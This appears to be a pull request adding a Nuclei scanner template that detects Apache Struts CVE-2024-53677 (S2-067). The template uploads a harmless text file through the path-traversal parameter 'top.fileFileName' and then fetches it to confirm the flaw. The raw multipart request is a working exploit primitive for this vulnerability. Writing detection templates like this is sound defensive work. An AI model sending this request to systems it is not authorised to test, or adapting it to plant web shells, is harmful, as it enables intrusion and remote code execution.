### PR TITLE
Add CVE-2024-53677 - Apache Struts S2-067 File Upload Path Traversal

### DIFF
--- a/http/cves/2024/CVE-2024-53677.yaml
+++ b/http/cves/2024/CVE-2024-53677.yaml
@@ -1,0 +1,74 @@
+id: CVE-2024-53677
+
+info:
+  name: Apache Struts2 S2-067 - File Upload Path Traversal
+  author: Bushi-gg
+  severity: critical
+  description: |
+    Apache Struts versions 2.0.0 through 6.3.0.2 contain a file upload path traversal vulnerability
+    in the FileUploadInterceptor (S2-067). An attacker can manipulate file upload parameters by setting
+    top.{fileFieldName}FileName via OGNL expression evaluation to traverse the upload path, enabling
+    arbitrary file upload to controlled locations. This can lead to remote code execution.
+  reference:
+    - https://cwiki.apache.org/confluence/display/WW/S2-067
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-53677
+    - https://github.com/vulhub/vulhub/tree/master/struts2/s2-067
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-53677
+    cwe-id: CWE-22
+    epss-score: 0.93819
+    epss-percentile: 0.99855
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: apache
+    product: struts
+    shodan-query: http.html:"struts problem report"
+  tags: cve,cve2024,apache,struts,rce,fileupload,kev
+
+variables:
+  filename: "{{to_lower(rand_text_alpha(8))}}"
+
+http:
+  - raw:
+      - |+
+        POST /index.action HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEF123456
+        
+        ------WebKitFormBoundaryABCDEF123456
+        Content-Disposition: form-data; name="file"; filename="test.txt"
+        Content-Type: text/plain
+        
+        CVE-2024-53677-{{filename}}
+        ------WebKitFormBoundaryABCDEF123456
+        Content-Disposition: form-data; name="top.fileFileName"
+        
+        tmp/{{filename}}.txt
+        ------WebKitFormBoundaryABCDEF123456--
+        
+      - |
+        GET /upload/tmp/{{filename}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+        part: response_2
+
+      - type: word
+        part: body_2
+        words:
+          - "CVE-2024-53677-"
+          - "{{filename}}"
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body_2
+        regex:
+          - 'CVE-2024-53677-[a-z0-9]+'


### PR DESCRIPTION
## Template: CVE-2024-53677

### Vulnerability
- **CVE:** CVE-2024-53677 (S2-067)
- **Product:** Apache Struts 2.0.0 - 6.3.0.2
- **Type:** File Upload Path Traversal → Remote Code Execution
- **Severity:** Critical (CVSS 9.8)
- **CISA KEV:** Yes

### Description
Apache Struts FileUploadInterceptor allows path traversal via OGNL expression evaluation in the `top.{fileFieldName}FileName` parameter. An attacker can upload arbitrary files to controlled locations within the upload directory, leading to RCE.

### Detection Method
Two-step safe detection:
1. Upload a harmless `.txt` file using path traversal (`top.fileFileName=tmp/{random}.txt`)
2. Verify the file is accessible at the traversed path (`/upload/tmp/{random}.txt`)

### Testing
- ✅ Tested against `vulhub/struts2:s2-067` Docker container
- ✅ Nuclei v3.7.0 detection confirmed
- ✅ No false positives observed

### References
- https://cwiki.apache.org/confluence/display/WW/S2-067
- https://nvd.nist.gov/vuln/detail/CVE-2024-53677
- https://github.com/vulhub/vulhub/tree/master/struts2/s2-067

Closes: https://github.com/projectdiscovery/nuclei-templates/issues/13040